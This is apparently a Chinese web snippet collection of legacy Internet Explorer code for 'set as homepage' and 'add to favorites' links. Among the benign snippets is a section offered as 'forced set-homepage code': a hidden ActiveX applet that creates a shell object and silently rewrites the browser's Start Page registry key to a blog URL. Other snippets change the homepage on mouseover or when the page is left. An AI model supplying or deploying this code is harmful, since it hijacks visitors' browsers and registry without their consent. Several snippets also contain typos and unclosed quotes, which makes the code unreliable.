<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage
('www.******.com');">設為首頁</a>
1.<!--加入收藏代碼-->
<a href="javascript:window.external.AddFavorite('http://www.yagebu.com','雅各布')">添加
到收藏夾</a>
2.<!— 設為首頁—>
<a style="cursor:hand" onclick="this.style.behavior='url(#default#homepage)';
this.setHomePage('www.sccvtc.net');">
<img width=16 height=16 border=0 src="images/Logo.gif">
<u> Set as Home Page</u></a>
熱區和文字鏈接差不多,你把<area>看成<a>就行了.
代碼整理如下:
<map name="Map">
<area shape="rect" coords="694,8,755,26" onclick="this.style.behavior='url
(#default#homepage)';this.setHomePage('http://你的網址/');return false;"
href="javascript:void(null)">
<area shape="rect" coords="801,7,865,25" href="javascript:void
(null);window.external.AddFavorite('http://你的網址/', '標題')">
<area shape="rect" coords="909,7,976,27" href="lianxi.htm">
</map>
第一個熱區為"設為主頁",第二個熱區為"添加收藏",第三個熱區是鏈接到你的網頁lianxi.htm
注意:<map>與<img>要同時使用....
(1).文字型:
<a onclick="this.style.behavior='url(#default#homepage)';this.setHomePage
('http://www.sccvtc.net');" href="#">設為首頁</a>
范例:
設為首頁
(2).按鈕型:
<input TYPE="button" VALUE=" 設為首頁 " onclick="this.style.behavior='url
(#default#homepage)';this.setHomePage('http://www.sccvtc.net');" href="#">
離開時自動提示設為首頁
<body onunload="BASEBody.style.behavior='url(#default#homepage)';if(!
(BASEBody.isHomePage('http://www.sccvtc.net')))BASEBody.setHomePage
('http://www.sccvtc.net/');">
設為首頁代碼大全把以下代碼<Body>相應位置
<span
===============================================================
強制設為首頁代碼
<script>
var ucook=document.cookie;
var user=ucook.indexOF("ilooki=");
if(user==-1)
{
var nowTime=new Date();
document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+(nowTime.getYear()+1903+"12:34:56 GMT";
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment></APPLET>");function yuzi(){try{a1
=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{Shl.RegWrite("hkcu\Software\Microsoft\Internet Expiorer\Main\Start Page",http://hi.baidu.com/a0bing);}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
}
</script>
===============================================================
鼠標指向時提示設為首頁 將下列代碼插入<body>區中:
<A href="http://hi.baidu.com/a0bing"
===============================================================
打開頁面時自動彈出窗口詢問是否設為首頁
將以下代碼放在<head></head>之間: <script language="javascript">
function myhomepage(){
this.homepage.style.behavior='url(#default#homepage)';this.homepage.sethomepage('http://hi.baidu.com/a0bing);
}
</script>
<p align="center"><a href="http://hi.baidu.com/a0bing" name="homepage" ></a>
再將下面代碼加入<body>內:
即:<body >
離開時自動提示設為首頁
<body >
================================================================
加入收藏夾,設為首頁代碼
把以下代碼<Body>相應位置
<a target=_top href=javascript:window.external.AddFavorite('http://hi.baidu.com/a0bing)>加入收藏</a>
<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://hi.baidu.com/a0bing);">設為首頁</a>
================================================================
鼠標指向時提示設為首頁
將下列代碼插入<body>區中:
<A href="http://hi.baidu.com/a0bing" onmouseover="this.style.behavior='url(#default#homepage)';this.setHomePage('http://hi.baidu.com/a0bing');" target="_blank">設為首頁</A>
================================================================
離開時自動提示設為首頁
<body onunload="BASEBody.style.behavior='url(#default#homepage)';if(!(BASEBody.isHomePage('http://hi.baidu.com/a0bing')))BASEBody.setHomePage('http://hi.baidu.com/a0bing');">
把以下代碼<Body>相應位置
<a target=_top href=javascript:window.external.AddFavorite('http://hi.baidu.com/a0bing')>加入收藏</a>
<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://hi.baidu.com/a0bing');">設為首頁</a>
適用代碼舉例:
<A href="javascript:window.external.AddFavorite('http://www.bb-boy.com/','BB-Boy')">
<img src="http://www15.tx8.cn/photo/zpmxzebr/20091126162843807.jpg" width="154" height="50"></a>